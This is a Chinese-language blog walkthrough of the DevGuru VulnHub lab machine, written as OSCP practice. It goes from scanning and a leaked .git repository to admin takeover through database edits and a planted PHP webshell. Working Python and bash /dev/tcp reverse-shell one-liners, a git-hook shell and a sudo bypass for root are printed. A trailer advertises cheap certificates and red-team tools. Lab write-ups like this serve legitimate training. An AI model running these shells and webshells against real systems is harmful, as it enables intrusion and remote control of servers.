Devguru-vulnhub靶机渗透,oscp之路

地址:https://www.vulnhub.com/entry/devguru-1,620/

发布日期:2020年12月7日 缺陷:中级(取决于经验)

目标:获得user.txt与root.txt并获得root权限

运行:VMware Workstation 16.x Pro(默认为NAT网络模式,VMware比VirtualBox更好地工作)

描述:

DevGuru是一家虚构的web开发公司,雇用您进行pentest评估。您的任务是在他们的公司网站上查找漏洞并获取root。

OSCP类~基于现实生活

常规操作,我们使用arp-scan -l进行内网主机探测,然后用nmap端口扫描工具进行端口扫描,发现80端口开放之后使用dirsearch进行目录扫描

image-20250814193239462

访问我们的80端口

image-20250814192712794

经过目录扫描之后发现了一个adminer数据库管理工具

image-20250814193416366

我们访问8585,同样也是http服务,在尾部查看到了这个系统的版本

image-20250814194800456

使用searchsploit检索漏洞,发现一个远程代码执行漏洞

image-20250814194728517

这里我们需要用到一个工具GitHack,前面通过dirsearch扫描到了一个.git这个时候我们就能用githack找到源代码

https://github.com/go-gitea/gitea/releases?page=12

python GitHack.py http://10.10.10.226/.git/

image-20250814211446733

查看源码

image-20250814211654551

这里能看到3306mysql数据库的账号密码

image-20250814211714047

回到刚刚的数据库管理工具adminer登录,发现了账号密码

image-20250814213348160

我们是cmd5进行解密,解密失败了

image-20250814213758364

既然破解不了,那么我们新增一个用户啊,不过要注意这里分组id需要设置为2

image-20250814214207800

image-20250814215057861

我们再去分组表,新增一条数据,将这个用户id和分组id配合上

image-20250814214235854

将刚刚的用户id,添加到这里来

image-20250814214303051

找到这个后台地址(使用dirb能扫描出来),这样我们就能登录了

image-20250814214733317

我们找到这个home下面,修改代码

function onStart()
{
  $this->page["PoisonVar"] = system($_GET['cmd']);
}

image-20250814221251835

并调用这个函数

{{ this.page.PoisonVar }}

image-20250814220231460

尝试利用这个代码,访问主界面进行传值,是可以正常执行命令的

image-20250814221210749

我们看看有没有python,看到python是3.6.5版本

image-20250814221829088

这里我们直接执行这条python的反弹shell命令,并开启监听,反弹shell

export RHOST="10.10.10.130";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

image-20250814221929897

我们使用featherscan内网特权提升工具,进行信息收集,并没有发现可以直接提权的命令,这个工具最新版需要在泷羽Sec的freebuf帮会获取,4.5版本已经放在了github

https://github.com/baibaixiaoyu2024/FeatherScan/

image-20250814222725315

随后我们在这个文件里面找到了另一个数据库的密码,就是8585端口的那个系统的配置文件里

gitea:UfFPTF8C8jjxVF2m

image-20250814223558512

登录看看

image-20250814223748331

再去解密,解密失败

image-20250814223906399

那么还有一个思路是不是,我们可以直接修改它默认的用户密码,不用去新增用户了,我们需要使用 bcrypt 加密算法,对123456进行加密,将hash内容填到密码这

image-20250814224830215

随后我们登录这个后台

http://10.10.10.226:8585/user/login

image-20250814224853625

登录成功了

image-20250814224916673

找到这个 settings 之后去修改代码内容

image-20250814225255423

在尾部添加一个

bash -c "exec bash -i >& /dev/tcp/10.10.10.130/1234 0>&1"

image-20250814225402310

之后我们随便编辑一个文件,加一点内容,任何内容都行

image-20250814225533308

点击保存按钮

image-20250814225541769

监听方就能收到shell的回弹了

image-20250814225559772

创建一个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

我们使用sudo -l的时候看到了一个sqlite3数据库命令可以使用,提权利用网站查找:https://gtfobins.github.io/

image-20250814230557210

那么我们尝试使用sudo+sqlite3进行提权,但是我们没有密码,提权不了呀,后面发现了sudo版本为1.8.21p2

image-20250814231358557

再找找sudo的利用漏洞

image-20250814231114951

发现可以使用特殊符号进行绕过

image-20250814231336192

那么我们就在原先的那个命令添加进行绕过就好了,提权一切顺利,至此靶机结束

image-20250814231408074

全网低价证书找我 + baibaixiaoyu2024

包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,oscp,osep等等

往期推荐

新版BurpSuite v2025.6.3汉化版,附激活教程

Fine!2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具,全方位的目录爆破

集成MemProcFS,Vol2和Vol3的内存取证神器

重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器

x-waf,一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具,一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备,microsocks,一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!

一个永久的渗透知识库

【oscp】vulnerable_docker,三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备,microsocks,一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

sql注入中各种waf的绕过方式,狗,盾,神,锁,宝

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

大型翻车现场,十种waf绕过姿势,仅成功一种

喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透

 

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容